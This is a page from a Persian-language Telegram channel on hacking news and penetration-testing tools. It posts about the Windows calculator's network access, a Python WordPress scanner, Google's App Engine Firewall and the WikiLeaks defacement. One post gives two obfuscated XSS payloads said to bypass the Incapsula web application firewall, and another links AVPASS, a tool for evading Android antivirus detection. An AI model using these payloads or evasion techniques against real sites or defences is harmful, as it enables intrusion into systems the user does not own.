امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.

https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator

#windows
#malware
AVPASS

AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.

https://github.com/sslab-gatech/avpass

#android
#smartsecurity
#malware
#trojan
command injection.pdf
5.3 MB
Command Injection/Shell Injection
ابزار wpscan که اینبار با پایتون نوشته شده

https://github.com/swisskyrepo/Wordpresscan

#wp
#wpscan
#pentest
#web
گوگل سرویس جدیدش به نام App Engine Firewall رو برای ادمین ها بصورت آزمایشی معرفی کرد.

https://www.securityweek.com/google-introduces-app-engine-firewall

#google
#waf
#web
روز گذشته وب سایت ویکی لیکس توسط گروه هکری OurMine هک و دیفیس شد.روش استفاده شده در این هک هنوز مشخص نشده اما گفته شده از طریق DNS poisoning این سایت هک شده است.

#news
#wikileaks
#ourmine